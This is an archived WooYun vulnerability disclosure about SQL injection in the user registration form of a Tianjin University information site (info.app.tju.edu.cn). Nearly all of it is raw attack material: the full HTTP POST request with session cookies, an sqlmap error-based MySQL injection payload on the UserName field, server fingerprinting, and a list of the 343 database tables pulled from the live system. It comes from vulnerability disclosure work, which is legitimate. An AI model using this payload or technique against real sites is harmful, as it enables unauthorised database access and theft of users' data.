乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-26: 细节已通知厂商并且等待厂商处理中 2015-12-01: 厂商已经主动忽略漏洞,细节向公众公开
POST /User/register HTTP/1.1Content-Length: 417Content-Type: application/x-www-form-urlencodedCookie: PHPSESSID=ur6d70njkgisrrgv92lndmk034; 5meA_2132_saltkey=gIWxwWXa; 5meA_2132_lastvisit=1448286257; 5meA_2132_sid=J40810; 5meA_2132_lastact=1448290356%09member.php%09logging; 5meA_2132_onlineusernum=1; 5meA_2132_home_readfeed=1448289858; 5meA_2132_home_diymode=1; 5meA_2132_st_t=0%7C1448289866%7Cfd10dba8dfd1f5b2410419252ddd0856; 5meA_2132_forum_lastvisit=D_40_1448289859D_37_1448289866; 5meA_2132_visitedfid=47D37D40; 5meA_2132_onlineindex=1; 5meA_2132_st_p=0%7C1448289868%7C92d2799cca5f07555ef9cc62a7d0709b; 5meA_2132_sendmail=1; 5meA_2132__refer=%252Fbbs%252Fhome.php%253Fac%253Dfavorite%2526formhash%253Daa3e4b95%2526handlekey%253Dfavoriteforum%2526id%253D40%2526mod%253Dspacecp%2526type%253Dforum; 5meA_2132_connect_not_sync_feed=1; 5meA_2132_connect_not_sync_t=1; 5meA_2132_viewid=tid_21; thinkphp_show_page_trace=0|0; _ga=GA1.3.924220299.1448263039; _gat=1; bdshare_firstime=1448263038771; BAIDUID=B08E9B04CCAA921EF53A517D9B444291:FG=1; 5meA_2132_atarget=1Host: info.app.tju.edu.cnConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*ConfirmPassword=g00dPa%24%24w0rD&Email=sample%40email.tst&Password=g00dPa%24%24w0rD&UserName=11
sqlmap resumed the following injection point(s) from stored session:---Parameter: UserName (POST) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: ConfirmPassword=g00dPa$$w0rD&[email protected]&Password=g00dPa$$w0rD&UserName=11') AND (SELECT 2874 FROM(SELECT COUNT(*),CONCAT(0x7170627871,(SELECT (ELT(2874=2874,1))),0x716a6a7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('wnQP'='wnQP---web server operating system: Linux CentOS 6.5web application technology: Apache 2.2.15back-end DBMS: MySQL 5.0Database: info[343 tables]+-----------------------------------+| Member || _academy || _activity || _album || _collect || _comment || _hotword || _image || _info || _info_type || _lost || _market || _market_category || _notice || _pass || _photo || _recruit || _role || _specialty || _thumbup || _user || bbs_common_admincp_cmenu || bbs_common_admincp_group || bbs_common_admincp_member || bbs_common_admincp_perm || bbs_common_admincp_session || bbs_common_admingroup || bbs_common_adminnote || bbs_common_advertisement || bbs_common_advertisement_custom || bbs_common_banned || bbs_common_block || bbs_common_block_favorite || bbs_common_block_item || bbs_common_block_item_data || bbs_common_block_permission || bbs_common_block_pic || bbs_common_block_style || bbs_common_block_xml || bbs_common_cache || bbs_common_card || bbs_common_card_log || bbs_common_card_type || bbs_common_connect_guest || bbs_common_credit_log || bbs_common_credit_log_field || bbs_common_credit_rule || bbs_common_credit_rule_log || bbs_common_credit_rule_log_field || bbs_common_cron || bbs_common_devicetoken || bbs_common_district || bbs_common_diy_data || bbs_common_domain || bbs_common_failedip || bbs_common_failedlogin || bbs_common_friendlink || bbs_common_grouppm || bbs_common_invite || bbs_common_magic || bbs_common_magiclog || bbs_common_mailcron || bbs_common_mailqueue || bbs_common_member || bbs_common_member_action_log || bbs_common_member_connect || bbs_common_member_count || bbs_common_member_crime || bbs_common_member_field_forum || bbs_common_member_field_home || bbs_common_member_forum_buylog || bbs_common_member_grouppm || bbs_common_member_log || bbs_common_member_magic || bbs_common_member_medal || bbs_common_member_newprompt || bbs_common_member_profile || bbs_common_member_profile_setting || bbs_common_member_security || bbs_common_member_secwhite || bbs_common_member_stat_field || bbs_common_member_status || bbs_common_member_validate || bbs_common_member_verify || bbs_common_member_verify_info || bbs_common_myapp || bbs_common_myinvite || bbs_common_mytask || bbs_common_nav || bbs_common_onlinetime || bbs_common_optimizer || bbs_common_patch || bbs_common_plugin || bbs_common_pluginvar || bbs_common_process || bbs_common_regip || bbs_common_relatedlink || bbs_common_remote_port || bbs_common_report || bbs_common_searchindex || bbs_common_seccheck || bbs_common_secquestion || bbs_common_session || bbs_common_setting || bbs_common_smiley || bbs_common_sphinxcounter || bbs_common_stat || bbs_common_statuser || bbs_common_style || bbs_common_stylevar || bbs_common_syscache || bbs_common_tag || bbs_common_tagitem || bbs_common_task || bbs_common_taskvar || bbs_common_template || bbs_common_template_block || bbs_common_template_permission || bbs_common_uin_black || bbs_common_usergroup || bbs_common_usergroup_field || bbs_common_visit || bbs_common_word || bbs_common_word_type || bbs_connect_disktask || bbs_connect_feedlog || bbs_connect_memberbindlog || bbs_connect_postfeedlog || bbs_connect_tthreadlog || bbs_forum_access || bbs_forum_activity || bbs_forum_activityapply || bbs_forum_announcement || bbs_forum_attachment || bbs_forum_attachment_0 || bbs_forum_attachment_1 || bbs_forum_attachment_2 || bbs_forum_attachment_3 || bbs_forum_attachment_4 || bbs_forum_attachment_5 || bbs_forum_attachment_6 || bbs_forum_attachment_7 || bbs_forum_attachment_8 || bbs_forum_attachment_9 || bbs_forum_attachment_exif || bbs_forum_attachment_unused || bbs_forum_attachtype || bbs_forum_bbcode || bbs_forum_collection || bbs_forum_collectioncomment || bbs_forum_collectionfollow || bbs_forum_collectioninvite || bbs_forum_collectionrelated || bbs_forum_collectionteamworker || bbs_forum_collectionthread || bbs_forum_creditslog || bbs_forum_debate || bbs_forum_debatepost || bbs_forum_faq || bbs_forum_filter_post || bbs_forum_forum || bbs_forum_forum_threadtable || bbs_forum_forumfield || bbs_forum_forumrecommend || bbs_forum_groupcreditslog || bbs_forum_groupfield || bbs_forum_groupinvite || bbs_forum_grouplevel || bbs_forum_groupuser || bbs_forum_hotreply_member || bbs_forum_hotreply_number || bbs_forum_imagetype || bbs_forum_medal || bbs_forum_medallog || bbs_forum_memberrecommend || bbs_forum_moderator || bbs_forum_modwork || bbs_forum_newthread || bbs_forum_onlinelist || bbs_forum_order || bbs_forum_poll || bbs_forum_polloption || bbs_forum_polloption_image || bbs_forum_pollvoter || bbs_forum_post || bbs_forum_post_location || bbs_forum_post_moderate || bbs_forum_post_tableid || bbs_forum_postcache || bbs_forum_postcomment || bbs_forum_postlog || bbs_forum_poststick || bbs_forum_promotion || bbs_forum_ratelog || bbs_forum_relatedthread || bbs_forum_replycredit || bbs_forum_rsscache || bbs_forum_sofa || bbs_forum_spacecache || bbs_forum_statlog || bbs_forum_thread || bbs_forum_thread_moderate || bbs_forum_threadaddviews || bbs_forum_threadcalendar || bbs_forum_threadclass || bbs_forum_threadclosed || bbs_forum_threaddisablepos || bbs_forum_threadhidelog || bbs_forum_threadhot || bbs_forum_threadimage || bbs_forum_threadlog || bbs_forum_threadmod || bbs_forum_threadpartake || bbs_forum_threadpreview || bbs_forum_threadprofile || bbs_forum_threadprofile_group || bbs_forum_threadrush || bbs_forum_threadtype || bbs_forum_trade || bbs_forum_tradecomment || bbs_forum_tradelog || bbs_forum_typeoption || bbs_forum_typeoptionvar || bbs_forum_typevar || bbs_forum_warning || bbs_home_album || bbs_home_album_category || bbs_home_appcreditlog || bbs_home_blacklist || bbs_home_blog || bbs_home_blog_category || bbs_home_blog_moderate || bbs_home_blogfield || bbs_home_class || bbs_home_click || bbs_home_clickuser || bbs_home_comment || bbs_home_comment_moderate || bbs_home_docomment || bbs_home_doing || bbs_home_doing_moderate || bbs_home_favorite || bbs_home_feed || bbs_home_feed_app || bbs_home_follow || bbs_home_follow_feed || bbs_home_follow_feed_archiver || bbs_home_friend || bbs_home_friend_request || bbs_home_friendlog || bbs_home_notification || bbs_home_pic || bbs_home_pic_moderate || bbs_home_picfield || bbs_home_poke || bbs_home_pokearchive || bbs_home_share || bbs_home_share_moderate || bbs_home_show || bbs_home_specialuser || bbs_home_userapp || bbs_home_userappfield || bbs_home_visitor || bbs_mobile_setting || bbs_mobileoem_member || bbs_mobileoem_pushthreads || bbs_portal_article_content || bbs_portal_article_count || bbs_portal_article_moderate || bbs_portal_article_related || bbs_portal_article_title || bbs_portal_article_trash || bbs_portal_attachment || bbs_portal_category || bbs_portal_category_permission || bbs_portal_comment || bbs_portal_comment_moderate || bbs_portal_rsscache || bbs_portal_topic || bbs_portal_topic_pic || bbs_security_evilpost || bbs_security_eviluser || bbs_security_failedlog || bbs_ucenter_admins || bbs_ucenter_applications || bbs_ucenter_badwords || bbs_ucenter_domains || bbs_ucenter_failedlogins || bbs_ucenter_feeds || bbs_ucenter_friends || bbs_ucenter_mailqueue || bbs_ucenter_memberfields || bbs_ucenter_members || bbs_ucenter_mergemembers || bbs_ucenter_newpm || bbs_ucenter_notelist || bbs_ucenter_pm_indexes || bbs_ucenter_pm_lists || bbs_ucenter_pm_members || bbs_ucenter_pm_messages_0 || bbs_ucenter_pm_messages_1 || bbs_ucenter_pm_messages_2 || bbs_ucenter_pm_messages_3 || bbs_ucenter_pm_messages_4 || bbs_ucenter_pm_messages_5 || bbs_ucenter_pm_messages_6 || bbs_ucenter_pm_messages_7 || bbs_ucenter_pm_messages_8 || bbs_ucenter_pm_messages_9 || bbs_ucenter_protectedmembers || bbs_ucenter_settings || bbs_ucenter_sqlcache || bbs_ucenter_tags || bbs_ucenter_vars || info_activities || info_activity || info_adds || info_admlog || info_books || info_collect || info_collects || info_comment || info_comments || info_image || info_info || info_loginlog || info_logs || info_market || info_market_category || info_pass || info_photo || info_photo_album || info_recruit || info_school || info_specialty || info_thumbup || info_type || info_user || info_users || info_vote || info_vote_users || info_zan || info_zannum |+-----------------------------------+
危害等级:无影响厂商忽略
忽略时间:2015-12-01 16:56
漏洞Rank:4 (WooYun评价)
暂无
